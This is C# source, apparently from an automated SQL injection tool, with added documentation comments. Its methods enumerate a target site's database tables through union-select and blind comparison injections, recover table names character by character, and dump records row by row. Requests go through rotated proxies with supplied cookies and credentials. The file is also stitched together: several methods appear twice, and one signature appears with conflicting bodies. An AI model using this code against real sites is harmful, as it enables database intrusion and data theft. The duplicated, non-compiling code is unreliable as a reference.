/// <summary>
/// Fetches the next user table whose sysobjects id is above <paramref name="PreviousTableID"/>, then its
/// row count, using two union-select requests against _TargetURL, and returns both as a populated Table.
/// </summary>
/// <param name="PreviousTableID">Exclusive lower bound on sysobjects.id; callers walk tables by passing the last id back in.</param>
/// <returns>Table with Name, ObjectID and RecordCount set; RecordCount is -1 when the count response was empty.</returns>
/// <remarks>
/// Defender's view: both requests carry the "sysobjects" / "xtype=char(85)" / "convert(int, ...)" text in the
/// injected parameter, which is the kind of content a WAF rule or a search over request logs would match.
/// </remarks>
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
    GlobalDS.Table retVal = new GlobalDS.Table();
    // Request 1: "name:id" (char(58) is ':') of a user table (xtype 'U' spelled as char(85)) with id > PreviousTableID.
    // Which of the candidate rows comes back depends on GeneralPurposeUnionTextSelect, not visible here.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
    string ResultPage, ResultText;
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // NOTE(review): values[1] throws IndexOutOfRangeException when the parsed text contains no ':' (e.g. an empty response)
    string[] values = ResultText.Split(':');
    retVal.Name = values[0];
    retVal.ObjectID = Convert.ToInt64(values[1]);
    // Request 2: ":count(*)" for that table; the leading separator is stripped below
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (ResultText.Length > 0)
    {
        ResultText = ResultText.Substring(1, ResultText.Length - 1); // drop the leading ':'
        retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
    }
    else
    {
        retVal.RecordCount = -1; // sentinel: no count in the response
    }
    return(retVal);
}
/// <summary>
/// Appends one "field" element per entry of <paramref name="Tbl"/>.FieldList to the writer. Each element
/// carries "id" (1-based position), "name" and "datatype" attributes; a "primary" attribute with the
/// literal text "true" is emitted only for fields flagged IsPrimary.
/// </summary>
/// <param name="xOutput">Writer positioned inside the enclosing table element.</param>
/// <param name="Tbl">Table whose first FieldCount entries of FieldList are serialized.</param>
private void WriteFieldToXml(ref XmlTextWriter xOutput, GlobalDS.Table Tbl)
{
    int position = 0;
    while (position < Tbl.FieldCount)
    {
        GlobalDS.Field current = Tbl.FieldList[position];
        position++; // attribute ids are 1-based

        xOutput.WriteStartElement("field");

        xOutput.WriteStartAttribute("id", null);
        xOutput.WriteString(position.ToString());
        xOutput.WriteEndAttribute();

        xOutput.WriteStartAttribute("name", null);
        xOutput.WriteString(current.FieldName);
        xOutput.WriteEndAttribute();

        xOutput.WriteStartAttribute("datatype", null);
        xOutput.WriteString(current.DataType.ToString());
        xOutput.WriteEndAttribute();

        // Absent rather than "false" for non-key fields, matching the reader's optional "primary" attribute
        if (current.IsPrimary)
        {
            xOutput.WriteStartAttribute("primary", null);
            xOutput.WriteString(true.ToString().ToLower());
            xOutput.WriteEndAttribute();
        }

        xOutput.WriteEndElement();
    }
}
/// <summary>
/// Fills in the field list of an injected database table by asking the target for its column count
/// and then for each column in turn.
/// </summary>
/// <param name="TableData">Table whose ObjectID identifies the target table; receives one AddField per column.</param>
public void PopulateTableStructure(ref GlobalDS.Table TableData)
{
    int total = GetFieldCount(TableData.ObjectID);
    int index = 0;
    while (index < total)
    {
        TableData.AddField(GetFieldData(TableData.ObjectID, index));
        index++;
    }
}
// }}}
// {{{ PullDataFromIndividualTable
/// <summary>
/// Dumps the requested columns of <paramref name="SrcTable"/> one record at a time by stepping through
/// its primary key, writing each record to <paramref name="xOutput"/> as it arrives and returning all of them.
/// </summary>
/// <param name="SrcTable">Table whose FieldList, Name and RecordCount drive the walk.</param>
/// <param name="ColumnIDs">Indices into SrcTable.FieldList of the columns to retrieve.</param>
/// <param name="xOutput">Writer that receives each record through OutputRecordToFile.</param>
/// <returns>One Hashtable per retrieved record; empty when no field is flagged IsPrimary, because nothing is fetched then.</returns>
/// <remarks>
/// Defender's view: every row costs at least one IteratePrimaryKey and one GetRecord call, so the request
/// count against the target grows with RecordCount — a sustained run of near-identical requests that differ
/// only in the injected parameter. The exact per-row request count depends on those helpers, not visible here.
/// </remarks>
private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
    List <Hashtable> retVal = new List <Hashtable>();
    long RecordCounter = 0;
    // Sized by the request; slots for ids that never match a FieldList index keep their default value
    GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
    GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
    int ColumnCounter = 0;
    string PrimaryKeyName = String.Empty;
    SqlDbType PrimaryKeyType = SqlDbType.Int;
    UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
    // Generate Field List
    for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
    {
        UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
        // Keep the field if its index was requested; ColumnList follows FieldList order, not ColumnIDs order
        if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
        {
            ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
            ColumnCounter++;
        }
        // If several fields are flagged primary, the last one in FieldList wins
        if (SrcTable.FieldList[FieldCounter].IsPrimary)
        {
            PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
            PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
        }
    }
    // No primary key: no walk is attempted and the empty list is returned without any status message
    if (PrimaryKeyName.Length > 0)
    {
        for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
        {
            // Advance to the next key value, then fetch the selected columns for that key
            CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
            Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
            retVal.Add(Record);
            OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
        }
    }
    return(retVal);
}
/// <summary>
/// Records the most recently reported table (which may still be incomplete) in PartialTable.
/// </summary>
/// <param name="ChangedTable">The table as currently known.</param>
private void TableChanged(GlobalDS.Table ChangedTable)
{
    // Plain overwrite; the previous partial table is not kept
    PartialTable = ChangedTable;
}
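/// <summary>
/// Restores the username, the tables-finished flag and the table/field list from a previously
/// serialized schema node (the reader side of the XML written by WriteFieldToXml and its caller).
/// </summary>
/// <param name="TargetNode">Schema element with optional "username" and "tablesfinished" attributes and zero or more "table" children.</param>
/// <exception cref="System.FormatException">"tablesfinished", "id" or "recordcount" is present but not parseable.</exception>
/// <exception cref="System.OverflowException">"id" or "recordcount" does not fit in 64 bits.</exception>
/// <exception cref="System.ArgumentException">"datatype" is not a SqlDbType member name.</exception>
/// <remarks>
/// The file is treated as untrusted input only as far as the parsers allow: non-numeric ids and unknown
/// enum names throw rather than being silently defaulted, so a corrupted or hand-edited file fails loudly.
/// _DBTables is only overwritten when the node holds at least one "table" element (kept as the original
/// behaved; possibly intentional so an empty node does not wipe a partially built list — confirm).
/// </remarks>
private void DeserializeSchemaXml(XmlNode TargetNode)
{
    // Init member vars
    _Username = "";
    _AllTablesRetrieved = true;

    XmlAttribute username = TargetNode.Attributes["username"];
    if (username != null)
    {
        _Username = username.InnerText;
    }

    XmlAttribute tablesFinished = TargetNode.Attributes["tablesfinished"];
    if (tablesFinished != null)
    {
        _AllTablesRetrieved = bool.Parse(tablesFinished.InnerText);
    }

    XmlNodeList Tables = TargetNode.SelectNodes("table");
    if (Tables.Count > 0)
    {
        List<GlobalDS.Table> TableList = new List<GlobalDS.Table>();
        foreach (XmlNode ExtractedTable in Tables)
        {
            GlobalDS.Table ThisTable;
            // Elements lacking either "name" or "id" are skipped rather than added half-filled
            if (TryDeserializeTableNode(ExtractedTable, out ThisTable))
            {
                TableList.Add(ThisTable);
            }
        }
        _DBTables = TableList.ToArray();
    }
}

// Builds one Table from a "table" element; returns false (and a blank table) when "name" or "id" is missing.
private static bool TryDeserializeTableNode(XmlNode ExtractedTable, out GlobalDS.Table ThisTable)
{
    ThisTable = new GlobalDS.Table();
    XmlAttribute name = ExtractedTable.Attributes["name"];
    XmlAttribute id = ExtractedTable.Attributes["id"];
    if (name == null || id == null)
    {
        return false;
    }
    ThisTable.Name = name.InnerText;
    // ObjectID is assigned 64-bit values elsewhere in this class, so parse the full range
    // (Int32.Parse would overflow for larger ids) and do it culture-invariantly.
    ThisTable.ObjectID = System.Int64.Parse(id.InnerText, System.Globalization.CultureInfo.InvariantCulture);
    XmlAttribute recordCount = ExtractedTable.Attributes["recordcount"];
    if (recordCount != null)
    {
        ThisTable.RecordCount = System.Int64.Parse(recordCount.InnerText, System.Globalization.CultureInfo.InvariantCulture);
    }
    foreach (XmlNode ExtractedField in ExtractedTable.SelectNodes("field"))
    {
        ThisTable.AddField(DeserializeFieldNode(ExtractedField));
    }
    return true;
}

// Builds one Field from a "field" element; every attribute is optional and absent ones leave the default.
private static GlobalDS.Field DeserializeFieldNode(XmlNode ExtractedField)
{
    GlobalDS.Field ThisField = new GlobalDS.Field();
    XmlAttribute name = ExtractedField.Attributes["name"];
    if (name != null)
    {
        ThisField.FieldName = name.InnerText;
    }
    XmlAttribute dataType = ExtractedField.Attributes["datatype"];
    if (dataType != null)
    {
        // Unknown names throw ArgumentException rather than defaulting; kept loud on purpose
        ThisField.DataType = (System.Data.SqlDbType)System.Enum.Parse(typeof(System.Data.SqlDbType), dataType.InnerText);
    }
    XmlAttribute primary = ExtractedField.Attributes["primary"];
    if (primary != null)
    {
        // Same contract as before: unparseable text means "not primary"
        bool isPrimary;
        bool.TryParse(primary.InnerText, out isPrimary);
        ThisField.IsPrimary = isPrimary;
    }
    return ThisField;
}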
/// <summary>
/// Fetches the next user table whose sysobjects id is above <paramref name="PreviousTableID"/>, then its
/// row count, using two union-select requests against _TargetURL, and returns both as a populated Table.
/// </summary>
/// <param name="PreviousTableID">Exclusive lower bound on sysobjects.id; callers walk tables by passing the last id back in.</param>
/// <returns>Table with Name, ObjectID and RecordCount set; RecordCount is -1 when the count response was empty.</returns>
/// <remarks>
/// Defender's view: both requests carry the "sysobjects" / "xtype=char(85)" / "convert(int, ...)" text in the
/// injected parameter, which is the kind of content a WAF rule or a search over request logs would match.
/// </remarks>
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
    GlobalDS.Table retVal = new GlobalDS.Table();
    // Request 1: "name:id" (char(58) is ':') of a user table (xtype 'U' spelled as char(85)) with id > PreviousTableID.
    // Which of the candidate rows comes back depends on GeneralPurposeUnionTextSelect, not visible here.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
    string ResultPage, ResultText;
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // NOTE(review): values[1] throws IndexOutOfRangeException when the parsed text contains no ':' (e.g. an empty response)
    string[] values = ResultText.Split(':');
    retVal.Name = values[0];
    retVal.ObjectID = Convert.ToInt64(values[1]);
    // Request 2: ":count(*)" for that table; the leading separator is stripped below
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (ResultText.Length > 0)
    {
        ResultText = ResultText.Substring(1, ResultText.Length - 1); // drop the leading ':'
        retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
    }
    else
    {
        retVal.RecordCount = -1; // sentinel: no count in the response
    }
    return retVal;
}
/// <summary>
/// Recovers the name and row count of the table with id <paramref name="TableID"/> through comparison
/// searches (RecursiveSearch over vectors built from _VectorBuffer plus the plugin's AndGreaterThanWrapper):
/// first the name length, then each character of the name, then the record count.
/// </summary>
/// <param name="TableID">Object id of the table to describe.</param>
/// <returns>Table with ObjectID, RecordCount and Name set.</returns>
/// <remarks>
/// Two modes, chosen by the sign of _Options.Throttle: non-negative runs the character searches sequentially
/// with a fixed one-second pause each; negative queues one thread-pool work item per character, which
/// writes into the shared UnsafeCharArray, and then polls CharsLeft until every item has reported.
/// Defender's view: each character costs a full RecursiveSearch, so one table name turns into a long run
/// of requests that differ only in the injected comparison; the threaded mode compresses that run into a burst.
/// </remarks>
private GlobalDS.Table RetrieveTable(long TableID)
{
    GlobalDS.Table RetVal = new GlobalDS.Table();
    StringBuilder NameBuilder = new StringBuilder();
    StringBuilder CurrentVector = new StringBuilder();
    CurrentVector.Append(_VectorBuffer);
    CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.TableNameLength(TableID)));
    // Name length first: it bounds the character loop and sizes the shared buffer
    long Size = RecursiveSearch(1,0,CurrentVector.ToString());
    // NOTE(review): lock(this) locks on a publicly reachable object; a private readonly gate object is the usual replacement
    lock(this)
    {
        UnsafeCharArray = new char[Size];
        CharsLeft = Size;
        Thread.Sleep(1000);
        WaitCallback myCallback = new WaitCallback (ThreadedRecursiveCharacterSearch);
        for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
        {
            CurrentVector = new StringBuilder();
            CurrentVector.Append(_VectorBuffer);
            CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.TableNameCharacterValue(AscCounter, TableID)));
            if (_Options.Throttle >= 0)
            {
                // Sequential mode: the pause is a fixed second; the value of _Options.Throttle itself is not used here
                Thread.Sleep(1000);
                NameBuilder.Append(Convert.ToChar(RecursiveSearch(1, UNICODE_LIMIT, CurrentVector.ToString())));
            }
            else
            {
                // Threaded mode: 0-based index, presumably the slot of UnsafeCharArray the worker fills — confirm in ThreadedRecursiveCharacterSearch
                ThreadedText ttx = new ThreadedText((int)AscCounter - 1, CurrentVector.ToString());
                ThreadPool.QueueUserWorkItem (myCallback, ttx);
            }
        }
        CurrentVector = new StringBuilder();
        CurrentVector.Append(_VectorBuffer);
        CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.NumberOfRecords(NameBuilder.ToString())));
        long TableRecordCount = RecursiveSearch(1,0, CurrentVector.ToString());
        RetVal.ObjectID = TableID;
        RetVal.RecordCount = TableRecordCount;
        // RetrievePrimaryKey(TableID);
        string TableName;
        if (_Options.Throttle >= 0)
        {
            TableName = NameBuilder.ToString();
        }
        else
        {
            // Wait for every queued character search to report back; there is no timeout on this poll
            while(CharsLeft > 0)
            {
                Thread.Sleep(1000);
            }
            TableName = new String(UnsafeCharArray);
        }
        RetVal.Name = TableName;
    }
    return RetVal;
}
/// <summary>
/// Collects the object ids of the target database's tables one probe at a time, continuing after
/// whatever <paramref name="ExistingIDs"/> already holds, and reports each id through TableChanged as it is found.
/// </summary>
/// <param name="ExistingIDs">Ids gathered by an earlier run, or null; they are copied to the front of the result and shorten the loop by their count.</param>
/// <returns>ExistingIDs (if any) followed by the newly found ids.</returns>
/// <remarks>
/// Defender's view: every id costs one RecursiveSearch, i.e. a series of comparison requests that differ only
/// in the injected parameter; the total scales with GetNumberOfTablesInDatabase().
/// </remarks>
private long[] GetTableIDs(long[] ExistingIDs)
{
    List<long> retVal;
    if (ExistingIDs != null) retVal = new List<long>(ExistingIDs); else retVal = new List<long>();
    long TableCount = GetNumberOfTablesInDatabase();
    StringBuilder CurrentVector = new StringBuilder();
    long ThisID = 0; // id found by the previous probe; seeds NextLowestTableID (presumably "lowest id above this one")
    long LastID = 1; // lower bound handed to RecursiveSearch
    int StartingPoint = ExistingIDs == null ? 0 : ExistingIDs.Length;
    for (int i = StartingPoint; i < TableCount; i++)
    {
        CurrentVector = new StringBuilder();
        CurrentVector.Append(_VectorBuffer);
        CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.NextLowestTableID(ThisID)));
        ThisID = RecursiveSearch(LastID,0,CurrentVector.ToString());
        // Publish a name-less placeholder through TableChanged before the name is resolved elsewhere
        GlobalDS.Table tbl = new GlobalDS.Table();
        tbl.ObjectID = ThisID;
        LastID = ThisID;
        tbl.Name = string.Empty;
        TableChanged(tbl);
        retVal.Add(ThisID);
    }
    return retVal.ToArray();
}
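/// <summary>
/// Restores the username, the tables-finished flag and the table/field list from a previously
/// serialized schema node (the reader side of the XML written by WriteFieldToXml and its caller).
/// </summary>
/// <param name="TargetNode">Schema element with optional "username" and "tablesfinished" attributes and zero or more "table" children.</param>
/// <exception cref="System.FormatException">"tablesfinished", "id" or "recordcount" is present but not parseable.</exception>
/// <exception cref="System.OverflowException">"id" or "recordcount" does not fit in 64 bits.</exception>
/// <exception cref="System.ArgumentException">"datatype" is not a SqlDbType member name.</exception>
/// <remarks>
/// The file is treated as untrusted input only as far as the parsers allow: non-numeric ids and unknown
/// enum names throw rather than being silently defaulted, so a corrupted or hand-edited file fails loudly.
/// _DBTables is only overwritten when the node holds at least one "table" element (kept as the original
/// behaved; possibly intentional so an empty node does not wipe a partially built list — confirm).
/// </remarks>
private void DeserializeSchemaXml(XmlNode TargetNode)
{
    // Init member vars
    _Username = "";
    _AllTablesRetrieved = true;

    XmlAttribute username = TargetNode.Attributes["username"];
    if (username != null)
    {
        _Username = username.InnerText;
    }

    XmlAttribute tablesFinished = TargetNode.Attributes["tablesfinished"];
    if (tablesFinished != null)
    {
        _AllTablesRetrieved = bool.Parse(tablesFinished.InnerText);
    }

    XmlNodeList Tables = TargetNode.SelectNodes("table");
    if (Tables.Count > 0)
    {
        List<GlobalDS.Table> TableList = new List<GlobalDS.Table>();
        foreach (XmlNode ExtractedTable in Tables)
        {
            GlobalDS.Table ThisTable;
            // Elements lacking either "name" or "id" are skipped rather than added half-filled
            if (TryDeserializeTableNode(ExtractedTable, out ThisTable))
            {
                TableList.Add(ThisTable);
            }
        }
        _DBTables = TableList.ToArray();
    }
}

// Builds one Table from a "table" element; returns false (and a blank table) when "name" or "id" is missing.
private static bool TryDeserializeTableNode(XmlNode ExtractedTable, out GlobalDS.Table ThisTable)
{
    ThisTable = new GlobalDS.Table();
    XmlAttribute name = ExtractedTable.Attributes["name"];
    XmlAttribute id = ExtractedTable.Attributes["id"];
    if (name == null || id == null)
    {
        return false;
    }
    ThisTable.Name = name.InnerText;
    // ObjectID is assigned 64-bit values elsewhere in this class, so parse the full range
    // (Int32.Parse would overflow for larger ids) and do it culture-invariantly.
    ThisTable.ObjectID = System.Int64.Parse(id.InnerText, System.Globalization.CultureInfo.InvariantCulture);
    XmlAttribute recordCount = ExtractedTable.Attributes["recordcount"];
    if (recordCount != null)
    {
        ThisTable.RecordCount = System.Int64.Parse(recordCount.InnerText, System.Globalization.CultureInfo.InvariantCulture);
    }
    foreach (XmlNode ExtractedField in ExtractedTable.SelectNodes("field"))
    {
        ThisTable.AddField(DeserializeFieldNode(ExtractedField));
    }
    return true;
}

// Builds one Field from a "field" element; every attribute is optional and absent ones leave the default.
private static GlobalDS.Field DeserializeFieldNode(XmlNode ExtractedField)
{
    GlobalDS.Field ThisField = new GlobalDS.Field();
    XmlAttribute name = ExtractedField.Attributes["name"];
    if (name != null)
    {
        ThisField.FieldName = name.InnerText;
    }
    XmlAttribute dataType = ExtractedField.Attributes["datatype"];
    if (dataType != null)
    {
        // Unknown names throw ArgumentException rather than defaulting; kept loud on purpose
        ThisField.DataType = (System.Data.SqlDbType)System.Enum.Parse(typeof(System.Data.SqlDbType), dataType.InnerText);
    }
    XmlAttribute primary = ExtractedField.Attributes["primary"];
    if (primary != null)
    {
        // Same contract as before: unparseable text means "not primary"
        bool isPrimary;
        bool.TryParse(primary.InnerText, out isPrimary);
        ThisField.IsPrimary = isPrimary;
    }
    return ThisField;
}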